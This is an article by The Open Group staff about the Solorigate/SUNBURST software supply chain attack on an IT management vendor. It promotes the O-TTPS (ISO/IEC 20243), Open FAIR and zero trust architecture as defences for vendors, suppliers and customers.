By Jim Hietala (VP, BD and Security), Andras Szakal (VP and CTO), John Linford (Security and OTTF Forum Director) – The Open Group
In potentially the most damaging cyber-supply chain attack ever, a leading IT systems management vendor became the latest hi-tech company to suffer a major cybersecurity breach with wide-reaching consequences. The malware that caused the attack has been dubbed Solorigate by Microsoft and code-named SUNBURST by FireEye, the security consulting firm that uncovered the breach after falling victim to it late last year.
After successfully infiltrating the development environment, attackers were able to observe and learn how to subvert the vendor’s development and operations pipeline. Hackers were then able to maliciously taint the vendor’s product by planting a sophisticated trojan. Once the software, which required broad systems access, was installed in customers’ environments, the attackers were able to leverage the tainted software to exfiltrate sensitive information from within an organization’s network.
Given that the exfiltration used trusted channels, the attack went under the radar of most normal methods of detection. In other words, Solorigate was able to masquerade as valid network traffic to avoid detection. Malicious actors employed counter detection malware to identify and evade forensic and anti-virus tools on compromised networks. As such, routine updates containing the tainted software were used to compromise thousands of customers, including major defense and government networks.
The security breach itself is not surprising. We have known for some time that highly capable, nation-state threat actors have been working on these sorts of supply chain attacks, targeting software firms that can provide large-scale impacts.
Forensic teams are currently evaluating how the attackers successfully gained access to the vendor’s development environment and subverted its nominal build, test, and deploy process to plant the maliciously tainted software into the product. With that said, it was instantly clear that the vendor was not employing Supply Chain Risk (SCRM) mitigation techniques that may have limited the damage.
Why does it matter?
In the realm of supply chain risk management, Solorigate represents a true worst-case scenario for vendors and their customers. In this attack, a determined, highly capable threat actor compromised the software of a very widely used product and used standard update mechanisms to deploy malware onto potentially thousands of customers. As the malware was able to spread unimpeded laterally through customers’ networks, the blast radius affected entire companies and government organizations in near record time.
Media reports indicate that among those organizations known to be affected are several US Government Departments (Treasury, Commerce, and Homeland Security) as well as FireEye, the security firm that discovered the compromise.
What’s more, CISOs and security staff have been dramatically impacted. Organizations have been in “drop everything mode” to implement detection mechanisms and mitigations in various components across their networks. This trend is likely continue for some time as teams seek to remove the malware from all infected system and assess the true damage.
What can technology providers of ICT do to prevent similar supply chain breaches?
Technology providers can benefit from existing industry best practice. ISO/IEC-20243 (also known as the Open Trusted Technology Provider™ Standard, or O-TTPS), was developed by ICT providers in partnership with the government to address similar taint and counterfeit threats against ICT supply chains. Had the vendor adopted and followed this standard in advance, it would have been a powerful tool in helping to prevent Solorigate.
ISO20243, developed by the Open Trusted Technology Forum (a Forum of The Open Group) was originally driven by the US DoD as part of the Comprehensive Cybersecurity Initiative (also known as CNCI). CNCI predicted the future threat of supply chain attacks such as Solorigate, and worked to prepare the ICT community and COTS (commercial off-the-shelf) vendors against them. The standard addresses supply chain threats that manifest upstream at the technology provider, and spread downstream in IT supply chains. There is also a certification program that accompanies the standard, which consists of self-assessment and third party assessors.
The O-TTPS is a two-part standard: Part 1 is the requirements and recommendations, while Part 2 contains the assessment procedures. Both are freely available after creating a free login and are also available from ISO as ISO20243, Parts 1 & 2.
The O-TTPS provides a set of best practices in two general areas: engineering practices and supply chain management.
There are many relevant requirements found in the engineering practices of the O-TTPS that would have potentially helped to limit the attacker’s ability to compromise the vendor’s software. These include: software/firmware/hardware design; configuration management; development/engineering method process and practices; quality and test management; secure development/engineering management; threat analysis and mitigation; and vulnerability analysis and response.
In the supply chain management area of the O-TTPS, requirements that would have potentially been useful to the affected vendor include: risk management; employee and supplier security and integrity; business partner security; supply chain security training; information systems security; trusted technology components; secure transmission; open source handling, counterfeit mitigation; and malware detection.
It is worth noting that in today’s interconnected world where global supply chains are the status quo, technology suppliers who are intent on taking supply chain risk management seriously will need to encourage their upstream suppliers and downstream business partners to adopt and follow the O-TTPS as well.
Beyond adoption of the O-TTPS as a best practice standard, two additional security areas can impact security for technology providers – and implementing standards can similarly provide useful guidance for each. The first is risk measurement and management. The old saying “you can’t manage what you can’t measure” is key to investing in risk mitigations. Vendor organizations often struggle to effectively measure and manage risk, including both internal and external risks, and supply chain risks. The Open Group Open FAIR standards can help here, by providing the means to quantitatively measure risk, enabling more effective management of risks.
The second area revolves around taking a zero trust approach to security. This involves an emerging security architecture design known as Zero Trust Security Architecture (ZTA), where designers of security architecture —whether for customers or vendor organizations — assume zero trust on internal networks. This can limit an attacker’s ability to compromise systems in networks. The Open Group is working to standardize ZTA patterns and nomenclature, and is also working to begin an Open Source ZTA project in 2021.
What can others in the ICT supply chain do to ensure the security of their offerings, whether they are upstream or downstream of technology providers?
For those suppliers who are upstream of technology suppliers, including suppliers of code and hardware components, adopting the O-TTPS to guide secure development and supply chain management is highly recommended.
Likewise, for those business partners who are downstream of technology providers, including resellers, system integrators, and others in the fulfillment area, adoption of the O-TTPS in conjunction with athird party assessment is highly recommended. Increasingly, we will begin to see this approach be required by both the technology providers and customer organizations.
What can consumers of ICT do to ensure security of their supply chains?
Customer organizations, including commercial organizations and government organizations who are consumers of COTS hardware and software solutions, have the greatest role to play guarding supply chains against taint and counterfeit threats.
By adopting a globally recognized, best practices framework like ISO20243/O-TTPS and adding a certification requirement to ICT procurements, as well as to laws and regulations (for governments), customer organizations can help the industry improve the security of COTS products. This will benefit not just their own organization, but the security posture of the industry at large.
Customer organizations can also implement the aforementioned risk measurement standards and emerging zero trust security architecture thinking. These additions will enable them to more effectively measure and manage risk, as well as better architect security to combat the very real supply chain security threats we are facing today.